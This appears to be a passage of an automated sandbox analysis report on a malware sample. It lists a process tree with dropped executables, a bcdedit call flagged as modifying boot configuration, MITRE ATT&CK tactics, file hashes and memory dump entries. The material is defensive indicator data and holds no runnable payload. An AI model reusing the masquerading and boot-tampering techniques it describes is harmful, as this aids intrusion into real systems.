        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          Executes dropped EXE
          Loads dropped DLL
          PID:1008
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          Modifies boot configuration data using bcdedit
          PID:1292
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220521002317.log C:\Windows\Logs\CBS\CbsPersist_20220521002317.cab
    Drops file in Windows directory
    PID:268
Network
MITRE ATT&CK Matrix
Collection, Command and Control, Credential Access, Discovery, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Privilege Escalation
Downloads
  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    MD5     13aaafe14eb60d6a718230e82c671d57
    SHA1    e039dd924d12f264521b8e689426fb7ca95a0a7b
    SHA256  f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
    SHA512  ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
  • C:\Windows\rss\csrss.exe
    MD5     7da8b9fc5c5a67a06afc0749473f1b6e
    SHA1    7b0c1138015a3a573469e1142e44be65b73979c5
    SHA256  bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7
    SHA512  5b9a364aa7cdf6340e709afb5a60eabd045ace1eaeefaa23fd89ede50bd0a51329d69a4afd49ca270ebb80014882ef7728cf72a362a1d0a63d01ba66fa244df7
  • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
    MD5     13aaafe14eb60d6a718230e82c671d57
    SHA1    e039dd924d12f264521b8e689426fb7ca95a0a7b
    SHA256  f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
    SHA512  ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
  • \Users\Admin\AppData\Local\Temp\dbghelp.dll
    MD5     f0616fa8bc54ece07e3107057f74e4db
    SHA1    b33995c4f9a004b7d806c4bb36040ee844781fca
    SHA256  6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
    SHA512  15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c
  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    MD5     1afff8d5352aecef2ecd47ffa02d7f7d
    SHA1    8b115b84efdb3a1b87f750d35822b2609e665bef
    SHA256  c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
    SHA512  e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb
  • \Users\Admin\AppData\Local\Temp\osloader.exe
    MD5     e2f68dc7fbd6e0bf031ca3809a739346
    SHA1    9c35494898e65c8a62887f28e04c0359ab6f63f5
    SHA256  b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
    SHA512  26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
  • \Users\Admin\AppData\Local\Temp\symsrv.dll
    MD5     5c399d34d8dc01741269ff1f1aca7554
    SHA1    e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
    SHA256  e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
    SHA512  8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d
  • \Windows\rss\csrss.exe
    MD5     7da8b9fc5c5a67a06afc0749473f1b6e
    SHA1    7b0c1138015a3a573469e1142e44be65b73979c5
    SHA256  bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7
    SHA512  5b9a364aa7cdf6340e709afb5a60eabd045ace1eaeefaa23fd89ede50bd0a51329d69a4afd49ca270ebb80014882ef7728cf72a362a1d0a63d01ba66fa244df7
  • memory/868-68-0x0000000005130000-0x00000000054D7000-memory.dmp
  • memory/868-69-0x0000000005130000-0x00000000054D7000-memory.dmp
  • memory/868-70-0x0000000000400000-0x00000000036C8000-memory.dmp
  • memory/868-66-0x0000000000000000-mapping.dmp
  • memory/1292-84-0x0000000000000000-mapping.dmp
  • memory/1388-63-0x0000000000400000-0x00000000036C8000-memory.dmp
  • memory/1388-59-0x0000000004FB0000-0x0000000005357000-memory.dmp
  • memory/1388-58-0x0000000004FB0000-0x0000000005357000-memory.dmp
  • memory/1448-56-0x00000000053B0000-0x0000000005AA6000-memory.dmp
  • memory/1448-55-0x0000000005000000-0x00000000053A7000-memory.dmp
  • memory/1448-54-0x0000000005000000-0x00000000053A7000-memory.dmp
  • memory/1448-57-0x0000000000400000-0x00000000036C8000-memory.dmp
  • memory/1652-60-0x0000000000000000-mapping.dmp
  • memory/1856-62-0x000007FEFBF51000-0x000007FEFBF53000-memory.dmp
  • memory/1856-61-0x0000000000000000-mapping.dmp